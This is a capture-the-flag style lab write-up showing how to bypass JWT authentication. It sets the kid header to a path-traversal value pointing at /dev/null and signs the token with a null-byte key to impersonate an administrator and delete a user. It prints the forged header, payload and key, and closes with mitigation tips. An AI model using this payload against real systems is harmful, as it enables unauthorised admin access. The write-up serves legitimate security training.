JWTs (JSON Web Tokens) are stateless tokens used for authentication. They are signed using either a symmetric (HS256) or asymmetric (RS256) key and verified by the server before granting access.

The kid (Key ID) header is a hint to the server about which key to use when verifying the JWT signature. In a secure setup, this value should be matched against a static list of trusted key identifiers.

But when developers directly use the kid value to build a path and read secret keys from the filesystem, attackers can abuse it with path traversal — and even point it to /dev/null to get verified with a null byte. That's exactly what this attack leverages.

In this write-up, we exploit a poorly implemented JWT validation mechanism that uses the kid header to load a key from the server's file system. By using path traversal to point the kid to /dev/null and signing the token with a null byte (AA==), we impersonate the admin user and delete other users. 🧨

• Lab: JWT authentication bypass via kid header path traversal
• Account: wiener:peter
• Goal: Access /admin as administrator and delete the user carlos

This ain’t your average PoC. We’re going full gladiator mode — step-by-step, raw hacking, no fluff.

📌 Tool of Choice: Burp Suite + JWT Editor Extension — aka Hacker’s Swiss Army Knife 🗿

1. Enter the Arena

Launch the lab and log in using your trusted duo: wiener:peter.

🪪 Credentials? Check. Lab loaded? Check. Adrenaline? Hell yeah.

2. Touch the Forbidden Door

Try accessing /admin. You’ll be stopped at the gate:

“Admin interface only available if logged in as an administrator.” 🛑 But guess what? We become the admin.

3. Intercept That Sweet Packet

Capture the /admin request in Burp and slam it into Repeater.

⏳ It's about to get spicy.

4. Blacksmith Forge: Null Byte Key

• Go to JWT Editor > Keys > New Symmetric Key
• Forge a new key like the cyberblacksmith you are.
• Manually set the k value to AA== (Base64 for null byte) ☠️ That's right — we’re signing this bad boy with nothing.

5. Prep the Payload

Head back to JWT tab in Repeater. Highlight the token. You’re now holding a digital grenade.

6. Mold the Header of Doom

• Set sub to "administrator" — that’s who we are now
• Set kid to: ../../../../../../../dev/null

🎯 Precision path traversal — deep into the abyss.

7. Sign It Like a Legend

Click Sign, select the null-byte key, and tick Don’t modify the header. You’re not just modifying a token. You’re rewriting fate. 🗿🔥

8. Send It. Smash It. Own It.

Hit Send — and BOOM 💥 You’ve bypassed auth. You’re inside /admin.

No keys. No doors. Just brains and bytes.

9. Pull the Trigger on Carlos

Find: /admin/delete?username=carlos .

Paste it into the URL bar — fire it off like a precision-guided cyber missile. 🧨 Carlos? Eliminated.

10. Confirm the Kill 🏁

Right-click → Show in Browser.

Paste that final URL — Mission Complete, hacker. 🧠💀

The app is dynamically building a file path based on the kid value and using it to read the secret key. When we point it to /dev/null, it fetches an empty file, which pairs perfectly with our JWT signed using a null byte. The server sees a signature, doesn't throw an error, and grants us admin powers.💥

In a real-world scenario, this bug can lead to:

• 🚨 Full authentication bypass
• 🔐 Admin impersonation
• 👻 Stealth exploitation (no errors logged)
• ⚡ Fast and automatable attack

It’s a critical issue, especially when JWT libraries are used without validating kid values or restricting file access.

// JWT Header
{
  "alg": "HS256",
  "kid": "../../../../../../../dev/null"
}
// JWT Payload
{
  "sub": "administrator"
}
// Signing Key (Base64 null byte)
AA==

• 🚫 Never trust user-controlled kid headers
• ✅ Sanitize all inputs that touch your filesystem
• 🔐 Don’t dynamically load secrets — use static keys from memory
• 💀 /dev/null is not just harmless — in weak setups, it's lethal

This lab is an elegant example of how a null byte and path traversal can punch through your auth walls like butter. From user to admin — no brute force, no fancy exploit chain — just pure JWT misconfiguration fun 🧠🗿

If you’re a bug bounty hunter or pentester — always peek into JWT headers, especially when kid is involved. You never know what kind of mess you'll uncover.

And that wraps up another wild ride through the world of JWT misconfigurations. From null bytes to path traversal, we turned server logic inside out and walked out wearing the admin crown 👑.

Remember — hacking isn’t just about payloads and headers. It’s about mindset, creativity, and a little bit of controlled chaos.

So, whether you’re up late smashing Burp requests or sipping chai while scanning tokens…

Keep pushing boundaries. Keep breaking boxes. Keep hacking. Catch you in the next one, hacker. Until then…

#HappyHacking 🗿🔥💥